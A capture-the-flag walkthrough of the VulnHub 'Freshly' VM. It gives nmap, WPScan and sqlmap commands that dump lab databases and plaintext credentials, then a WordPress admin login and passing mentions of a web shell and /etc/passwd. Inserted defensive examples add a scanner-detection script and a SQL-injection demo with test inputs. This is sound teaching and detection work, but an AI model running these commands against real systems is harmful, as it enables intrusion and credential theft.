CTF Action - Freshly from Vulnhub


I’m back with another CTF walkthrough / diary. I was hungry for some action learning, so I went to VulnHub and picked a CTF somewhat randomly. Today’s fun is a CTF VM called: Freshly.


Let’s jump right into it. I ended up using VirtualBox to host this VM as my VMware Workstation 11 complained about importing the OVA.


Step One: Find My Target & Start Info Gathering

$ nmap -sP 192.168.1.1/24

result:
Nmap scan report for Freshly (192.168.1.149)

Sweet, I’ve got the IP for the target and now it’s time to roll.


After visiting the IP in my browser, I’m greeted with this picture:


[image]


I went looking for a Robots.txt, but none was found (darn).


Next, I did a scan to see what ports were open.


$ nmap -sV -A 192.168.1.149

result:
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-02-17T03:30:05+00:00
|_Not valid after: 2025-02-14T03:30:05+00:00
|_ssl-date: 2078-09-28T16:01:55+00:00; +63y59d14h23m12s from local time.
8080/tcp open http Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Site doesn't have a title (text/html).

So, it looks like I have a few ports to check out.


First bit of business is to hit 443, so I pull it up in my browser. After accepting the certificate warning, I'm greeted with a single text link.


Clicking the link goes to /wordpress/. Interesting.


Step Two: WordPress Fun

Here are the steps I went through:



  1. I visited the readme.html page to see if it was there. It was, and it shows WP version 4.1.6.

  2. It looks like the site is using some plugins, such as Contact Form 4.1, Cart66 Lite 1.5.3, etc.

  3. I decided to run WPScan against the site to speed up info gathering.


$ wpscan -u https://192.168.1.149/wordpress/ -e u,ap,tt,at

It's my own machine and I had other things to do, so I didn't mind running the above command (it does a lot of looking and takes a lot of time).


Right away I can see that this site is using a couple out-of-date plugins, which have vulnerabilities.
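The enumeration above leaves a distinctive trail in the web server's access log: a recognisable tool User-Agent, a burst of readme.txt requests under wp-content/plugins/ (most of them 404s), and repeated POSTs to the same login form. The following is an added example of detection logic for that pattern, written for this walkthrough and not part of the original post or of WPScan or sqlmap themselves. The log lines, the IP addresses and the thresholds are constructed; the tool names in the User-Agent regex are assumptions about default agent strings, not something the post states.

```python
import re
from collections import Counter, defaultdict

# Constructed Apache "combined" log lines. The addresses, timestamps and
# agent strings are invented for this example; they are not from the target VM.
SAMPLE_LOG = """\
192.168.1.50 - - [15/Jun/2015:10:00:01 +0000] "GET /wordpress/readme.html HTTP/1.1" 200 7413 "-" "WPScan v2.8"
192.168.1.50 - - [15/Jun/2015:10:00:02 +0000] "GET /wordpress/wp-content/plugins/cart66/readme.txt HTTP/1.1" 200 1203 "-" "WPScan v2.8"
192.168.1.50 - - [15/Jun/2015:10:00:02 +0000] "GET /wordpress/wp-content/plugins/akismet/readme.txt HTTP/1.1" 404 503 "-" "WPScan v2.8"
192.168.1.50 - - [15/Jun/2015:10:00:03 +0000] "GET /wordpress/wp-content/plugins/jetpack/readme.txt HTTP/1.1" 404 503 "-" "WPScan v2.8"
192.168.1.50 - - [15/Jun/2015:10:00:03 +0000] "GET /wordpress/wp-content/plugins/wordfence/readme.txt HTTP/1.1" 404 503 "-" "WPScan v2.8"
192.168.1.50 - - [15/Jun/2015:10:00:04 +0000] "GET /wordpress/wp-content/plugins/yoast-seo/readme.txt HTTP/1.1" 404 503 "-" "WPScan v2.8"
192.168.1.50 - - [15/Jun/2015:10:05:10 +0000] "POST /login.php HTTP/1.1" 200 412 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.168.1.50 - - [15/Jun/2015:10:05:10 +0000] "POST /login.php HTTP/1.1" 200 412 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.168.1.50 - - [15/Jun/2015:10:05:11 +0000] "POST /login.php HTTP/1.1" 200 412 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.168.1.77 - - [15/Jun/2015:10:06:00 +0000] "GET /wordpress/ HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
192.168.1.77 - - [15/Jun/2015:10:06:05 +0000] "POST /login.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [ts] "METHOD path PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Assumed default agent strings of common scanners; tools can change or randomise these.
SCANNER_UA = re.compile(r'(sqlmap|wpscan|dirbuster|nikto)', re.I)
PLUGIN_RE = re.compile(r'^/wordpress/wp-content/plugins/([^/]+)/')


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyse(log_text, plugin_404_threshold=3, login_post_threshold=3):
    """Return (ip, finding) pairs for scanner UAs, plugin enumeration and login probing."""
    scanner_ips = set()
    plugin_404 = defaultdict(set)   # ip -> plugin slugs that returned 404
    login_posts = Counter()         # ip -> number of POSTs to /login.php
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        if SCANNER_UA.search(rec["ua"]):
            scanner_ips.add(rec["ip"])
        pm = PLUGIN_RE.match(rec["path"])
        if pm and rec["status"] == "404":
            plugin_404[rec["ip"]].add(pm.group(1))
        if rec["method"] == "POST" and rec["path"] == "/login.php":
            login_posts[rec["ip"]] += 1

    findings = []
    for ip in sorted(scanner_ips):
        findings.append((ip, "scanner_user_agent"))
    for ip, slugs in sorted(plugin_404.items()):
        # Many distinct plugin slugs 404ing from one source = wordlist-driven enumeration.
        if len(slugs) >= plugin_404_threshold:
            findings.append((ip, "plugin_enumeration"))
    for ip, n in sorted(login_posts.items()):
        if n >= login_post_threshold:
            findings.append((ip, "login_form_probing"))
    return findings


if __name__ == "__main__":
    for ip, finding in analyse(SAMPLE_LOG):
        print(f"{ip}: {finding}")
```

The User-Agent check is the weakest of the three signals, since both tools can be told to send a browser agent string; the 404 burst against plugin paths and the repeated POSTs to one form survive that, which is why they are counted per source address rather than keyed on the agent.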


So I started messing with a possible Pro Player SQL injection vulnerability, but I’ve decided to hold off a little and keep looking for information.


Now I'm going back to running DirBuster on the main site.


Here are the directory goodies I found quickly:



  • /login.php

  • /phpmyadmin/


Ok, time to look into this further.


Step Three: SQL Checking

I found out about the tool sqlmap, which I had never used. After checking it out, I used the following command to get it going:


$ sqlmap -u http://192.168.1.149/login.php --data="user=1&password=1&s=Submit"

Result:

[INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.11

That’s pretty neat info there. Let’s see if there’s more it can do.
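What sqlmap has just confirmed is that the `user` and `password` fields of login.php end up inside the SQL text. The snippet below is an added example, written for this walkthrough and not taken from the target VM's login.php, showing the two ways a login check can be written and how an automated tester tells them apart. It uses an in-memory SQLite table as a stand-in for the target's MySQL `users` table; the column names follow the dump later in the post, the stored password is a constructed placeholder.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the target's MySQL users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'example-password')")
    return conn


def login_vulnerable(conn, user, password):
    """Builds the query by string concatenation: the submitted values become SQL."""
    sql = (f"SELECT COUNT(*) FROM users WHERE username = '{user}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone()[0] > 0


def login_parameterized(conn, user, password):
    """Uses bound parameters: the submitted values are only ever data."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (user, password)).fetchone()[0] > 0


def probe(conn, login_fn, user, password):
    """Run a login attempt and report ("ok", result) or ("error", exception name).

    A database error surfacing from a stray quote in user input is exactly the
    signal sqlmap's initial probes look for before it tries anything further.
    """
    try:
        return ("ok", login_fn(conn, user, password))
    except sqlite3.Error as exc:
        return ("error", type(exc).__name__)


# A single quote, the simplest malformed input, and a comment-terminated username.
QUOTE_INPUT = ("1'", "1")
COMMENT_INPUT = ("admin' -- ", "wrong")
VALID_INPUT = ("admin", "example-password")


if __name__ == "__main__":
    conn = make_db()
    for label, fn in (("vulnerable", login_vulnerable), ("parameterized", login_parameterized)):
        for name, (u, p) in (("quote", QUOTE_INPUT), ("comment", COMMENT_INPUT), ("valid", VALID_INPUT)):
            print(f"{label:13s} {name:8s} -> {probe(conn, fn, u, p)}")
```

Running it shows the asymmetry a tester exploits: the concatenated version throws a syntax error on the lone quote and accepts the comment-terminated username with a wrong password, while the parameterized version returns False for both and True only for the real credentials. Bound parameters are the fix; the plaintext password column visible in the dump below is a separate problem that parameterization does not address.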


The next command is similar, but we're specifying the database system and looking for database names.


$ sqlmap -u http://192.168.1.149/login.php --data="user=1&password=1&s=Submit" --dbms=mysql --dbs

Note: Answer yes to the question below.

do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y

After a handful of minutes, I’m presented with a listing of available databases:


available databases [7]:
[*] information_schema
[*] login
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] users
[*] wordpress8080

Sweet! All the monies are on wordpress8080 being the WP db, so let's hit it. Also of note are some curious DB names, like login and users. Let's advance things.


I’m going to run sqlmap again and this time add the table name.


$ sqlmap -u http://192.168.1.149/login.php --data="user=1&password=1&s=Submit" --dbms=mysql --tables -D wordpress8080

Result:
Database: wordpress8080
[1 table]
+-------+
| users |
+-------+

Alright, there’s a table called users here, so next I’m going to use that table name with sqlmap to get some more information (I hope).


$ sqlmap -u http://192.168.1.149/login.php --data="user=1&password=1&s=Submit" --dbms=mysql --dump -T users -D wordpress8080

Result:
Database: wordpress8080
Table: users
[1 entry]
+----------+---------------------+
| username | password            |
+----------+---------------------+
| admin    | SuperSecretPassword |
+----------+---------------------+


So now I have some credentials to work with. Since I’m here and in sqlmap, I’m going to check out the users and login databases.


First, the login db.


Database: login
[2 tables]
+-----------+
| user_name |
| users     |
+-----------+

For user_name, I was able to retrieve candyshop.


And for users, I retrieved:


Database: login
Table: users
[2 entries]
+----------+-----------+
| password | user_name |
+----------+-----------+
| password | candyshop |
| PopRocks | Sir       |
+----------+-----------+


Very interesting. I now have multiple credential options.


Finally, I’m going to check out the users db.


I received an error when trying to get tables, so I’m moving on. If needed, I’ll revisit this issue.


Step Four: Credential Checking & Completion

I went back to /login.php and tried candyshop/password and Sir/PopRocks. I noticed that the resulting integer below the form changed from 0 to 1 (perhaps to signify a login state?).


Ok, let’s go to /wp-admin/ now and see if we can get into the WordPress site.


Upon arriving, I’m presented with a page to update the DB. I confirm and continue right into the login screen.


user: admin
password: SuperSecretPassword


And . . . I'm in. I'm now in control of the WordPress site. What now? :)


  • php web shell

  • /etc/passwd


# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"

I had a fun time doing this CTF. I recommend it for those just starting out, especially those with an interest in all things WordPress.


If you’re interested in sqlmap, check out Tool Time - SQLMap.